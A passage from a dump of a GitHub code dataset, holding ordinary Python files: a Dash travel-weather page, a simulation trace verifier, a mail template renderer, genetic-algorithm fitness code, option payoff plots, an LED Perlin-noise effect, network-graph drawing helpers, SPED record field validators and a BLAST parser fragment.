style=css_h2_pattern),\n html.H4('Umidade (%)', style=css_h4_pattern),\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-condition', style=css_h2_pattern),\n html.H4('Condição do Clima', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-wind_mph', style=css_h2_pattern),\n html.H4('Velocidade do Vento (mph)', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-is_day', style=css_h2_pattern),\n html.H4('Dia ou Noite', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n], style={'backgroundColor': 'white', 'height': '100%', 'display': 'flex', 'flexDirection': 'column'})\n\nfirst_location_layout = create_location_layout('first', df_routes['origin'][0], css_h2_pattern=css_dict_h2, css_h4_pattern=css_dict_h4,css_card_pattern=css_dict_card)\nsecond_location_layout = create_location_layout('second', df_routes['origin'][1] if len(df_routes['origin'].unique()) > 1 else None, css_h2_pattern=css_dict_h2, css_h4_pattern=css_dict_h4,css_card_pattern=css_dict_card)\n\nlayout = dbc.Container(fluid=True, children=[\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dbc.CardBody([ \n dbc.Col(children=[\n 
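# note: this md=2 column is the static sidebar holding the route-summary card ('Informações da rota')\n                            # and the logo; the two md=5 columns that follow hold the per-location weather\n                            # panels built by create_location_layout above.\n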
html.H1([html.Strong(\"Guia de Viagens\")]),\n                            dbc.Card([\n                                dbc.CardBody([\n                                    html.H4(html.Strong('Informações da rota:')),\n                                    html.Br(),\n                                    html.P('Origem: ', id='new-origin'),\n                                    html.P('Destino: ', id='new-destination'),\n                                    html.P('Distância: ', id='new-distance'),\n                                    html.P('Tempo estimado: ', id='new-trip_long'),\n                                ], style={'marginTop': '20px', 'backgroundColor': 'white'})\n                            ]),\n                            html.Img(id='new-weather-icon',src='/assets/logo.svg', height='100%', className='clickable-logo', style={'margin-top': '20px'}),\n                        ])\n                    ])\n                ])\n            ])\n        ], md=2), \n        dbc.Col([\n            first_location_layout\n        ], md=5),\n        dbc.Col([\n            second_location_layout\n        ], md=5)\n    ])\n])\n\n\n# Callback to update the options of the second dropdown\n@dash.callback(\n    Output('second-location-dropdown', 'options'),\n    [Input('first-location-dropdown', 'value')]\n)\ndef update_second_dropdown(selected_location):\n    options = [{'label': origin, 'value': origin} for origin in df_routes['origin'].unique() if origin != selected_location]\n    return options\n\n@dash.callback(\n    Output('first-location-name', 'children'),\n    [Input('first-location-dropdown', 'value')]\n)\ndef update_first_location_name(value):\n    return value\n\n@dash.callback(\n    Output('second-location-name', 'children'),\n    [Input('second-location-dropdown', 'value')]\n)\ndef update_second_location_name(value):\n    return value\n\n\n@dash.callback(\n    [Output('first-precip_mm', 'children'),\n     Output('first-humidity', 'children'),\n     Output('first-condition', 'children'),\n     Output('first-wind_mph', 'children'),\n     Output('first-is_day', 'children')],\n    [Input('first-location-dropdown', 'value')]\n)\ndef update_first_location_info(selected_location):\n    \n    selected_row = df_temp[df_temp['name'] == selected_location].sort_values('created_at', ascending=False).iloc[0]\n    \n    precip_mm = [html.Strong(selected_row['precip_mm'])]\n    humidity = [html.Strong(selected_row['humidity'])]\n    condition = [html.Strong(selected_row['condition'])]\n    wind_mph = [html.Strong(selected_row['wind_mph'])]\n    is_day = [html.Strong('Dia' if selected_row['is_day'] else 'Noite')]\n    \n    return precip_mm, humidity, condition, wind_mph, is_day\n    \n    \n@dash.callback(\n    [Output('second-precip_mm', 'children'),\n     Output('second-humidity', 'children'),\n     Output('second-condition', 'children'),\n     Output('second-wind_mph', 'children'),\n     Output('second-is_day', 'children')],\n    [Input('second-location-dropdown', 'value')]\n)\ndef update_second_location_info(selected_location):\n    \n    selected_row = df_temp[df_temp['name'] == selected_location].sort_values('created_at', ascending=False).iloc[0]\n    \n    precip_mm = [html.Strong(selected_row['precip_mm'])]\n    humidity = [html.Strong(selected_row['humidity'])]\n    condition = [html.Strong(selected_row['condition'])]\n    wind_mph = [html.Strong(selected_row['wind_mph'])]\n    is_day = [html.Strong('Dia' if selected_row['is_day'] else 'Noite')]\n    \n    return precip_mm, humidity, condition, wind_mph, is_day\n    \n    \n@dash.callback(\n    [Output('new-origin', 'children'),\n     Output('new-destination', 'children'),\n     Output('new-distance', 'children'),\n     Output('new-trip_long', 'children')],\n    [Input('first-location-dropdown', 'value'),\n     Input('second-location-dropdown', 'value')]\n)\ndef update_trip_info(origin, destination):\n    \n    if origin == destination:\n        return [\"Origem: \", \"Destino: \", \"Distância: \", \"Tempo estimado: \"]\n    \n    selected_row = df_routes[(df_routes['origin'] == origin) & (df_routes['destination'] == destination)].sort_values('created_at', ascending=False).iloc[0]\n    origin_info = [\"Origem: \", 
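# note: the 'Origem: ' label stays a plain string while the value is wrapped in\n    # html.Strong, so Dash renders it in bold inside the html.P children.\n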
html.Strong(selected_row['origin'])]\n destination_info = [\"Destino: \", html.Strong(selected_row['destination'])]\n distance_info = [\"Distância: \", html.Strong(selected_row['distance'])]\n trip_long_info = [\"Tempo estimado: \", html.Strong(selected_row['trip_long'])]\n \n return origin_info, destination_info, distance_info, trip_long_info","repo_name":"samurai-py/zebrinha-azul-dash-data-app","sub_path":"pages/trips.py","file_name":"trips.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15189191605","text":"from krpsim_tool_verif import Setting, Config_structure, Env\nfrom krpsim_error import ErrorOutput, CustomError\n\n\ndef get_action(action):\n tab = action.split(':')\n if len(tab) != 2:\n raise ErrorOutput(\"KRP Error: Bad output from the KRP_SIM trace\")\n try:\n cycle = int(tab[0])\n except Exception:\n raise ErrorOutput(\"KRP Error: Cycle should be a valid integer\")\n return cycle, tab[1]\n\n\ndef main():\n setting = Setting()\n config = Config_structure()\n config.stock = setting.stock\n config.process = setting.process\n\n env = Env(config)\n try:\n for action in setting.actions:\n cycle, name = get_action(action)\n if cycle < env.cycle:\n raise (ErrorOutput(\"Cycle problem in tracefile \"\n \"({} < {})\".format(cycle, env.cycle)))\n env.update_cycle(cycle)\n env.process(name)\n print(\"VERIFICATION OK\")\n except CustomError as err:\n print(err)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arobion/krp_sim","sub_path":"srcs/krpsim_verif.py","file_name":"krpsim_verif.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9460121130","text":"#!/usr/bin/env python\nimport csv\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\nfrom html.parser import HTMLParser\nfrom pathlib import Path\nfrom typing import DefaultDict, Dict, List, Optional, Sequence, Tuple\n\nimport click\nfrom jinja2 import Template\n\n\nclass HTMLCounter(HTMLParser):\n def __init__(self) -> None:\n super().__init__()\n self.count = 0\n\n def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:\n if tag == \"html\":\n self.count += 1\n\n\ndef load_template(tmpl_path: str) -> Template:\n with open(tmpl_path, \"r\", encoding=\"utf-8\") as input_tmpl:\n return Template(input_tmpl.read())\n\n\ndef render_all_content(\n template: Template,\n common_data: Dict[str, str],\n unique_data: Sequence[Dict[str, str]],\n separator: str,\n) -> Dict[str, str]:\n addr_to_content: Dict[str, str] = dict()\n mail_defdict: DefaultDict[str, int] = defaultdict(int)\n for data in unique_data:\n data.update(common_data)\n if separator:\n subject = separator.join([data[\"receiver_email\"], data[\"receiver_name\"]])\n else:\n subject = data[\"receiver_email\"]\n mail_defdict[subject] += 1\n # multi-mail\n if mail_defdict[subject] > 1:\n subject = \"{}__{:03n}\".format(subject, mail_defdict[subject])\n\n addr_to_content[subject] = template.render(**data)\n return addr_to_content\n\n\ndef export_mails(recv_to_mail: Dict[str, str], output_path: str) -> None:\n for receiver_mail, mail_content in recv_to_mail.items():\n parser = HTMLCounter()\n parser.feed(mail_content)\n if parser.count > 0:\n with open(\n output_path / Path(receiver_mail + \".html\"), \"w\", encoding=\"utf-8\"\n ) as output_html:\n output_html.write(mail_content)\n else:\n with open(\n output_path / 
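# note: plain-text fallback; HTMLCounter counted no <html> start tag in the rendered\n                # content, so this mail body is written as .txt instead of .html.\n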
Path(receiver_mail + \".txt\"), \"w\", encoding=\"utf-8\"\n            ) as output_file:\n                output_file.write(mail_content)\n\n\n@click.command()\n@click.argument(\"template_path\", type=click.Path(exists=True))\n@click.argument(\"receiver_data\", type=click.Path(exists=True))\n@click.option(\n    \"--separator\",\n    default=\"\",\n    show_default=False,\n    help=\"Separator used for subject suffix. It is disabled with empty string by default.\",\n)\n@click.option(\n    \"--output_path\",\n    type=click.Path(exists=False),\n    default=\"mails_to_sent\",\n    show_default=True,\n    help=\"Output path of rendered mails\",\n)\n@click.option(\n    \"--unique_csv\",\n    type=click.Path(exists=True),\n    help=\"Use CSV file to import unique data\",\n)\ndef main(\n    template_path: str,\n    receiver_data: str,\n    separator: str,\n    output_path: str,\n    unique_csv: str,\n) -> None:\n    \"\"\"\n    Application entry point\n    \"\"\"\n    if not os.path.isdir(output_path):\n        logging.info('Create directory \"%s\"', output_path)\n        Path(output_path).mkdir(parents=True)\n\n    if unique_csv:\n        with open(receiver_data, \"r\", encoding=\"utf-8\") as input_file:\n            data = json.load(input_file)\n            common_data = data[\"common_data\"]\n\n        with open(unique_csv, \"r\", encoding=\"utf-8-sig\") as input_file:\n            unique_data = [row for row in csv.DictReader(input_file)]\n    else:\n        with open(receiver_data, \"r\", encoding=\"utf-8\") as input_file:\n            data = json.load(input_file)\n            common_data = data[\"common_data\"]\n            unique_data = data[\"unique_data\"]\n\n    template = load_template(template_path)\n    recv_to_mail = render_all_content(template, common_data, unique_data, separator)\n    export_mails(recv_to_mail, output_path)\n\n\n# pylint: disable=no-value-for-parameter\nif __name__ == \"__main__\":\n    main()\n# pylint: enable=no-value-for-parameter\n","repo_name":"pycontw/mail_handler","sub_path":"mail_handler/render_mail.py","file_name":"render_mail.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"8054604133","text":"from math import sqrt\n\n\nclass Fitness:\n\n    def __init__(self):\n        pass\n\n    avg_fitness = 0\n    best_fitness = 0\n    standard_deviation = 0\n    fitness_threshold = 1.0\n\n    @classmethod\n    # Evaluate fitness for all phenotypes\n    # Fitness array returned is a one-to-one mapping of the phenotypes array\n    def evaluate_fitness_of_phenotypes(cls, phenotypes):\n\n        phenotypes_fitness = []\n        bit_vector_length = float(len(phenotypes[0].bit_vector))\n        for phenotype in phenotypes:\n\n            fitness = 0\n            for bit in phenotype.bit_vector:\n                fitness += bit\n\n            fitness /= bit_vector_length\n            phenotypes_fitness.append(fitness)\n\n        return phenotypes_fitness\n\n    @classmethod\n    def check_for_solution(cls, fitnesses):\n        for i in range(len(fitnesses)):\n            if cls.fitness_threshold <= fitnesses[i]:\n                return i\n\n        return -1\n\n    @classmethod\n    def index_of_best_solution(cls, fitnesses):\n        return fitnesses.index(max(fitnesses))\n\n    @classmethod\n    # Wrapper for calculating average and best\n    def get_fitness_of_phenotypes(cls, phenotypes):\n\n        # Determine fitness for phenotypes\n        phenotypes_fitness = cls.evaluate_fitness_of_phenotypes(phenotypes)\n\n        # Determine average fitness and best fitness\n        best_fitness = 0\n        total_fitness = 0\n\n        for fitness in phenotypes_fitness:\n\n            total_fitness += fitness\n\n            if fitness > best_fitness:\n                best_fitness = fitness\n\n        cls.best_fitness = best_fitness\n        cls.avg_fitness = (total_fitness / len(phenotypes_fitness))\n        cls.standard_deviation = 
cls.evaluate_standard_deviation(phenotypes_fitness)\n\n        return phenotypes_fitness\n\n    @classmethod\n    # Standard deviation of fitness\n    def evaluate_standard_deviation(cls, phenotypes_fitness):\n        avg_deviation = 0\n        for fitness in phenotypes_fitness:\n            avg_deviation += pow(fitness - cls.avg_fitness, 2)\n\n        return sqrt(avg_deviation/len(phenotypes_fitness))\n","repo_name":"klizter/SubSym","sub_path":"src/fitness.py","file_name":"fitness.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13221916519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: surajgiri\nHW3 Problem 3\n\"\"\"\n\n\"\"\"\nPayoff Function for the \nEuropean Call Option\nEuropean Put Option\nStrike Price 100 $\nPlot Graph\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef EUPayoff(s, x, type, position):\n    zero = np.zeros(len(s))\n    if type == \"call\" and position == \"long\":\n        option = np.maximum(s-x, zero)\n        return option\n    elif type == \"call\" and position == \"short\":\n        option = np.minimum(x-s, zero)\n        return option\n    elif type == \"put\" and position == \"long\":\n        option = np.maximum(x-s, zero)\n        return option\n    elif type == \"put\" and position == \"short\":\n        option = np.minimum(s-x, zero)\n        return option\n    else:\n        print(\"Invalid Option Input\")\n\nif __name__ == \"__main__\":\n    s = np.arange(0, 150, 0.1)\n    x = 100\n    types = [\"call\",\"put\"]\n    positions = [\"long\", \"short\"]\n\n    i = 0\n    for type in types:\n        for position in positions:\n            i = i + 1\n            plt.subplots()\n            plt.plot(s, EUPayoff(s, x, type, position))\n            plt.ylabel('Payoff')\n            plt.xlabel('Price')\n            plt.grid()\n            plt.title(position + ' ' + type + ' option')\n            plt.legend()\n            plt.show()","repo_name":"surajgiri7/Stochastic_Methods_Lab","sub_path":"HW03_2022_09_27/hw3p3.py","file_name":"hw3p3.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11333138476","text":"import numpy as np\nfrom noise import snoise3\n\nimport effects as ef\n\nimport colorsys\n\n\n# set hue2 to None for white mode\n# Use an empty list if beats is None\nclass TransitionPerlinNoiseEffect(ef.Effect):\n    def __init__(self, constellation, start_time, duration, saturation, layer, scale, speed, noise_dim, hue_list,\n                 hue_times):\n        super().__init__(start_time, duration)\n        self.constellation = constellation\n        self.start_time = start_time\n        self.duration = duration\n        self.end_time = start_time + duration\n        self.saturation = saturation\n        self.layer = layer\n        self.noise_gen = PerlinNoiseGenerator(*noise_dim, scale)\n        self.speed = speed  # Store the initial speed\n        self.noise_dim = noise_dim  # (width, height)\n        self.hue_list = hue_list  # list of hues to use (e.g. [0, 0.5, 1])\n        self.hue_times = hue_times  # start transition times between hues (e.g. 
[0, 20.23, 50.5])\n self.hue_transition_time = 3 # time to transition between hues in seconds\n\n def run(self, current_song_time):\n if not self.is_done(current_song_time):\n self.perlin_noise_effect(self.constellation, current_song_time)\n return True\n else:\n return False\n\n def is_done(self, current_song_time):\n if current_song_time >= self.end_time:\n return True\n\n def map_coord_to_noise(self, coord, max_coord):\n # Map LED's centroid coordinates to noise array coordinates\n return int(\n (coord + max_coord) / (2 * max_coord) * self.noise_dim[0]) # assuming x and y dimensions are the same\n\n def perlin_noise_effect(self, constellation, current_song_time):\n current_speed = self.speed\n noise_array = self.noise_gen.generate_perlin_noise(current_speed)\n\n for led in constellation.leds:\n x = self.map_coord_to_noise(led.xCoord_centroid, 950)\n y = self.map_coord_to_noise(led.yCoord_centroid, 615)\n\n hue = noise_array[y, x]\n color_int = self.get_color(hue, current_song_time)\n led.set_color(color_int)\n\n def get_color(self, hue, current_song_time):\n # Determine the interpolated hue based on the current song time and the transition time\n interpolated_hue = self.get_interpolated_hue(current_song_time)\n\n remapped_value = color_remap(hue, a=10, b=0.4) # remap to make it more or less white\n saturation_value = remapped_value * self.saturation\n\n # Interpolate between white and the current hue based on the remapped value\n hsv_color = (interpolated_hue, saturation_value, 1)\n color_rgb = colorsys.hsv_to_rgb(*hsv_color)\n color_int = [int(c * 255) for c in color_rgb]\n\n return color_int\n\n def get_interpolated_hue(self, current_song_time):\n\n for idx, hue_time in enumerate(self.hue_times):\n # If we are before the first hue_time\n if current_song_time < self.hue_times[0]:\n return self.hue_list[0]\n\n # Check if we are between two hue_times\n if idx < len(self.hue_times) - 1 and hue_time <= current_song_time < hue_time + self.hue_transition_time:\n hue1 = self.hue_list[idx]\n hue2 = self.hue_list[idx + 1]\n\n # Calculate how far we are into the transition\n ratio = (current_song_time - hue_time) / self.hue_transition_time\n\n # Interpolate between the two hues\n return (1 - ratio) * hue1 + ratio * hue2\n\n # If we are between two transition periods\n elif idx < len(self.hue_times) - 1 and hue_time + self.hue_transition_time <= current_song_time < \\\n self.hue_times[idx + 1]:\n return self.hue_list[idx + 1]\n\n return self.hue_list[-1] # return the last hue if current_song_time is beyond all hue_times\n\n\nclass PerlinNoiseGenerator:\n def __init__(self, width, height, scale):\n self.width = width\n self.height = height\n self.scale = scale\n self.z = 0\n\n self.CLIPPING_THRESHOLD = 0.50\n\n def generate_perlin_noise(self, speed):\n noise_array = np.zeros((self.height, self.width))\n\n for y in range(self.height):\n for x in range(self.width):\n noise_value = snoise3(x / self.scale, y / self.scale, self.z, octaves=6, persistence=0.5,\n lacunarity=2.0)\n\n if noise_value > self.CLIPPING_THRESHOLD:\n noise_value = self.CLIPPING_THRESHOLD\n elif noise_value < -self.CLIPPING_THRESHOLD:\n noise_value = -self.CLIPPING_THRESHOLD\n\n # now scale to the range of 0 to 1\n noise_value = (noise_value + self.CLIPPING_THRESHOLD) / (2 * self.CLIPPING_THRESHOLD)\n # snosie3 returns a value between -1 and 1, but the vast majority of values are between -0.6 and 0.6\n noise_array[y][x] = noise_value\n\n self.z += speed\n return noise_array\n\n\ndef color_remap(x, a=10, b=0.4):\n \"\"\"A custom 
sigmoid function with adjustable center.\n\n :param x: The input value.\n :param a: The parameter that adjusts the steepness of the sigmoid.\n :param b: The parameter that adjusts the center of the sigmoid.\n :return: The output value between 0 and 1.\n \"\"\"\n return 1 / (1 + np.exp(-a * (x - b)))\n","repo_name":"KyleH57/FlaskLights","sub_path":"effects2/transition_perlin.py","file_name":"transition_perlin.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6397795473","text":"\r\n\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib import colors\r\nimport numpy as np\r\n\r\ndef draw_communities(G, membership, pos):\r\n \"\"\"Draws the nodes to a plot with assigned colors for each individual cluster\r\n Parameters\r\n \r\n G : networkx graph\r\n membership : list\r\n A list where the position is the student and the value at the position is the student club membership.\r\n E.g. `print(membership[8]) --> 1` means that student #8 is a member of club 1.\r\n pos : positioning as a networkx spring layout\r\n E.g. nx.spring_layout(G)\r\n \"\"\" \r\n fig, ax = plt.subplots(figsize=(16,9))\r\n \r\n # Convert membership list to a dict where key=club, value=list of students in club\r\n club_dict = defaultdict(list)\r\n for student, club in enumerate(membership):\r\n club_dict[club].append(student)\r\n \r\n # Normalize number of clubs for choosing a color\r\n norm = colors.Normalize(vmin=0, vmax=len(club_dict.keys()))\r\n \r\n for club, members in club_dict.items():\r\n nx.draw_networkx_nodes(G, pos,\r\n nodelist=members,\r\n node_color=cm.jet(norm(club)),\r\n node_size=500,\r\n alpha=0.8,\r\n ax=ax)\r\n\r\n # Draw edges (social connections) and show final plot\r\n plt.title(\"Zachary's Karate Club\")\r\n nx.draw_networkx_edges(G, pos, alpha=0.5, ax=ax)\r\n \r\ndef graph_to_edge_matrix(G):\r\n \"\"\"Convert a networkx graph into an edge matrix.\r\n See https://www.wikiwand.com/en/Incidence_matrix for a good explanation on edge matrices\r\n \r\n Parameters\r\n ----------\r\n G : networkx graph\r\n \"\"\"\r\n # Initialize edge matrix with zeros\r\n edge_mat = np.zeros((len(G), len(G)), dtype=int)\r\n\r\n # Loop to set 0 or 1 (diagonal elements are set to 1)\r\n for node in G:\r\n for neighbor in G.neighbors(node):\r\n edge_mat[node][neighbor] = 1\r\n edge_mat[node][node] = 0\r\n\r\n return edge_mat\r\n\r\ndef draw_true_vs_pred(G, y_true, y_pred, pos, algo_name, ax):\r\n \r\n for student, club in y_true.items():\r\n if y_pred is not None:\r\n if club == y_pred[student]:\r\n node_color = [0, 1, 0]\r\n node_shape = 'o'\r\n else:\r\n node_color = [0, 0, 0]\r\n node_shape = 'X'\r\n \r\n nx.draw_networkx_nodes(G, pos,\r\n nodelist=[student],\r\n node_color=node_color,\r\n node_size=250,\r\n alpha=0.7,\r\n ax=ax,\r\n node_shape=node_shape)\r\n \r\n # Draw edges and show final plot\r\n ax.set_title(algo_name)\r\n nx.draw_networkx_edges(G, pos, alpha=0.5, ax=ax)\r\n\r\n","repo_name":"phdinds-aim/alis","sub_path":"notebooks/social-network-graphs/community_functions.py","file_name":"community_functions.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30834156211","text":"# -*- coding: utf-8 -*-\n\n\nimport re\n\nfrom datetime import date\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom .erros 
import CampoFixoError\nfrom .erros import CampoObrigatorioError\nfrom .erros import FormatoInvalidoError\n\n\nclass Campo(object):\n    \"\"\"\n    Base class for defining a field of a SPED record.\n\n    >>> campo = Campo(1, 'TESTE', True)\n    >>> campo\n    <sped.campos.Campo(1, TESTE)>\n    >>> campo.indice\n    1\n    >>> campo.nome\n    'TESTE'\n    >>> campo.obrigatorio\n    True\n    \"\"\"\n    def __init__(self, indice, nome, obrigatorio=False):\n        self._indice = indice\n        self._nome = nome\n        self._obrigatorio = obrigatorio\n\n    def __repr__(self):\n        return '<%s.%s(%s, %s)>' % (self.__class__.__module__,\n                                    self.__class__.__name__,\n                                    self._indice, self._nome)\n\n    @property\n    def indice(self):\n        return self._indice\n\n    @property\n    def nome(self):\n        return self._nome\n\n    @property\n    def obrigatorio(self):\n        return self._obrigatorio\n\n    def get(self, registro):\n        return registro.valores[self._indice] or None\n\n    def set(self, registro, valor):\n        if self._obrigatorio and not valor:\n            raise CampoObrigatorioError(registro, self.nome)\n        if not valor:\n            registro.valores[self._indice] = ''\n            return\n        if valor and not self.__class__.validar(valor):\n            raise FormatoInvalidoError(registro, self.nome)\n        if not isinstance(valor, str):\n            raise FormatoInvalidoError(registro, self.nome)\n        registro.valores[self._indice] = valor or ''\n\n    @staticmethod\n    def validar(valor):\n        return True\n\n\nclass CampoFixo(Campo):\n    \"\"\"\n    Class for defining a fixed-value field of a SPED record.\n\n    >>> campo = CampoFixo(1, 'REG', '0000')\n    >>> campo\n    <sped.campos.CampoFixo(1, REG)>\n    >>> campo.indice\n    1\n    >>> campo.nome\n    'REG'\n    >>> campo.obrigatorio\n    True\n    >>> campo.valor\n    '0000'\n    \"\"\"\n    def __init__(self, indice, nome, valor):\n        super().__init__(indice, nome, True)\n        self._valor = valor\n\n    @property\n    def valor(self):\n        return self._valor\n\n    def get(self, registro):\n        return self._valor\n\n    def set(self, registro, valor):\n        if valor != self._valor:\n            raise CampoFixoError(registro, self.nome)\n\n\nclass CampoAlfanumerico(Campo):\n    def __init__(self, indice, nome, obrigatorio=False, tamanho=None):\n        super().__init__(indice, nome, obrigatorio)\n        self._tamanho = tamanho\n\n    @property\n    def tamanho(self):\n        return self._tamanho\n\n    def set(self, registro, valor):\n        valor = valor or ''\n        if self._tamanho is not None:\n            valor = valor[:self._tamanho]\n        super().set(registro, valor)\n\n\nclass CampoBool(Campo):\n    def __init__(self, indice, nome, obrigatorio=False, valorVerdadeiro='S', valorFalso='N'):\n        super().__init__(indice, nome, obrigatorio)\n        self.valorVerdadeiro = valorVerdadeiro\n        self.valorFalso = valorFalso\n\n    def get(self, registro):\n        valor = super().get(registro)\n        if not valor:\n            return None\n        return valor == self.valorVerdadeiro\n\n    def set(self, registro, valor):\n        if isinstance(valor, bool):\n            super().set(registro, self.valorVerdadeiro if valor else self.valorFalso)\n        elif valor is None:\n            super().set(registro, None)\n        else:\n            raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoNumerico(Campo):\n    def __init__(self, indice, nome, obrigatorio=False,\n                 precisao=None, minimo=0, maximo=1000):\n        super().__init__(indice, nome, obrigatorio)\n        self._precisao = precisao if precisao is not None else 0\n        self._minimo = minimo\n        self._maximo = maximo\n\n    @property\n    def precisao(self):\n        return self._precisao\n\n    @property\n    def minimo(self):\n        return self._minimo\n\n    @property\n    def maximo(self):\n        return self._maximo\n\n    def get(self, registro):\n        valor = super().get(registro)\n        if not valor:\n            return None\n        return Decimal(valor.replace(',', '.'))\n\n    def set(self, 
registro, valor):\n if isinstance(valor, str):\n valor = Decimal(valor.replace(',', '.'))\n\n if isinstance(valor, Decimal) or isinstance(valor, float):\n super().set(registro, (('%.' + str(self._precisao) + 'f') % valor).replace('.', ','))\n elif isinstance(valor, int):\n super().set(registro, str(valor))\n elif not valor:\n super().set(registro, '0')\n else:\n raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoData(Campo):\n def __init__(self, indice, nome, obrigatorio=False):\n super().__init__(indice, nome, obrigatorio)\n\n def get(self, registro):\n valor = super().get(registro)\n if not valor:\n return None\n return datetime.strptime(valor, '%d%m%Y').date()\n\n def set(self, registro, valor):\n if isinstance(valor, date):\n super().set(registro, valor.strftime('%d%m%Y'))\n elif not valor:\n super().set(registro, None)\n else:\n raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoRegex(Campo):\n def __init__(self, indice, nome, obrigatorio=False, regex=None):\n super().__init__(indice, nome, obrigatorio)\n self._regex = re.compile('^' + regex + '$')\n\n def set(self, registro, valor):\n if not isinstance(valor, str):\n valor = str(valor)\n if not valor or self._regex.match(valor):\n super().set(registro, valor)\n else:\n raise FormatoInvalidoError(registro, str(self))\n\n # def __repr__(self):\n # return '' f'{self.__class__.__name__}({self.indice}, {self.nome}, {self._obrigatorio}, {self._regex})'\n\n\nclass CampoCNPJ(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) != 14:\n return False\n\n multiplicadores = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\n\n cnpj = [int(c) for c in valor]\n\n soma1 = sum([cnpj[i] * multiplicadores[i+1] for i in range(12)])\n soma2 = sum([cnpj[i] * multiplicadores[i] for i in range(13)])\n digito1 = 11 - (soma1 % 11)\n digito2 = 11 - (soma2 % 11)\n\n if digito1 >= 10:\n digito1 = 0\n\n if digito2 >= 10:\n digito2 = 0\n\n if cnpj[12] != digito1 or cnpj[13] != digito2:\n return False\n\n return True\n\n\nclass CampoCPF(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) != 11:\n return False\n\n multiplicadores = [11, 10, 9, 8, 7, 6, 5, 4, 3, 2]\n\n cpf = [int(c) for c in valor]\n\n soma1 = sum([cpf[i] * multiplicadores[i+1] for i in range(9)])\n soma2 = sum([cpf[i] * multiplicadores[i] for i in range(10)])\n digito1 = 11 - (soma1 % 11)\n digito2 = 11 - (soma2 % 11)\n\n if digito1 >= 10:\n digito1 = 0\n\n if digito2 >= 10:\n digito2 = 0\n\n if cpf[9] != digito1 or cpf[10] != digito2:\n return False\n\n return True\n\n\nclass CampoCPFouCNPJ(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) == 14:\n return CampoCNPJ.validar(valor)\n if len(valor) == 11:\n return CampoCPF.validar(valor)\n return False\n","repo_name":"sped-br/python-sped","sub_path":"sped/campos.py","file_name":"campos.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"pt","doc_type":"code","stars":42,"dataset":"github-code","pt":"67"} +{"seq_id":"73520727252","text":"from .faces import (\n # first, the classes\n Shape, Shape5p, Shape68p, Face, Atlas,\n # and now the functions\n detect, landmark, encode, compare, estimate_age, estimate_gender,\n normalize_landmark\n # and not much more for now\n)\n\nfrom . 
import align\n\nage_tags = [\n # the elements of the tuples are:\n # (lower age, higher age, description text)\n (-1, -1, \"none\"), # this one is a formality, it isn't used\n (0, 3, \"baby\"),\n (4, 9, \"child\"),\n (10, 13, \"preteen\"),\n (14, 17, \"teen\"),\n (18, 25, \"young\"),\n (26, 40, \"young adult\"),\n (41, 59, \"adult\"),\n (60, 99, \"elder\"),\n]\n","repo_name":"bconstanzo/phantom","sub_path":"phantom/faces/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"47680165608","text":"def scs(k):\n s = 0\n while k > 0:\n s += 1\n k //= 10\n return s\nn=int(input())\nt = 0\nfor x in range(1, n+1):\n t += scs(x)\nprint(t)\n","repo_name":"hoclentop/hoclentop.github.io","sub_path":"mau/2c275.py","file_name":"2c275.py","file_ext":"py","file_size_in_byte":154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29547023486","text":"\"\"\"Convert HSPs to hits.\"\"\"\n\nimport multiprocessing as mp\nimport os\nfrom itertools import groupby, permutations\n\nimport numpy as np\n\n\ndef parse_file(qspid, sspid):\n # Open files and process lines\n with open(f'../blast2hsps/out/hsps/{qspid}/{sspid}.tsv') as file:\n field_names = file.readline().rstrip('\\n').split('\\t')\n line2key = make_line2key(field_names)\n\n hits = []\n for _, group in groupby(file, line2key):\n hsps = []\n for line in group:\n 